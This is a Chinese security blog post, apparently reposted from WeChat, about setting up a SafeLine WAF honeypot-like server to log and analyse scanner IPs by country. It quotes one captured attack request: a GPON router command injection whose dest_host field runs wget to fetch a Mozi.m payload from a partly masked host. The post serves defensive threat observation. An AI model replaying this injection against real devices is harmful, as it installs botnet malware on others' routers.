收集海外商业和情报部门网络空间搜索引擎扫描器IP的思路

admin
admin
admin
139629
文章
114
评论
2025年4月7日00:08:37评论10 views字数 912阅读3分2秒阅读模式
雷池官网:waf-ce.chaitin.cn。
腾讯云上部署。
bash -c "$(curl -fsSLk https://waf-ce.chaitin.cn/release/latest/manager.sh)"yum install httpd -ysystemctl start httpdsystemctl enable httpdsystemctl status httpdcp /etc/httpd/conf/httpd.conf /etc/httpd/conf/httpd.conf.baknano /etc/httpd/conf/httpd.conflisten 80修改为listen 8080
在防火墙安全组添加9443端口
收集海外商业和情报部门网络空间搜索引擎扫描器IP的思路
访问流量到80之后转到8080的内网,所以访问公网IP的http服务
收集海外商业和情报部门网络空间搜索引擎扫描器IP的思路
目前完全通了。除了常见的UA,就是一些爬虫或者扫描器的了,例如censys这个网络空间搜索引擎,估计fofa、shodan等在这段时间都对这个开放80端口的IP有所扫描。
收集海外商业和情报部门网络空间搜索引擎扫描器IP的思路
排名靠前的是荷兰、波兰、美国、法国、瑞士、比利时、德国,其实挺有意思的,荷兰和波兰的IP反而是最多的。这还只是一个服务器,对于长亭的情报中心,能获取的信息可就太多了,从中分析一些发动攻击的团伙也不是什么难事儿,例如某个僵尸主机网络,毕竟现在的装机量都有将近30万了,非常的恐怖。
收集海外商业和情报部门网络空间搜索引擎扫描器IP的思路
这里面还获取到一个包含木马的链接,ip还是中国的。
POST /GponForm/diag_Form?images/ HTTP/1.1Host127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://119.***.***.254:57237/Mozi.m+-O+->/tmp/gpon8

原文始发于微信公众号(张无瑕思密达):收集海外商业和情报部门网络空间搜索引擎扫描器IP的思路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月7日00:08:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   收集海外商业和情报部门网络空间搜索引擎扫描器IP的思路https://cn-sec.com/archives/3914713.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息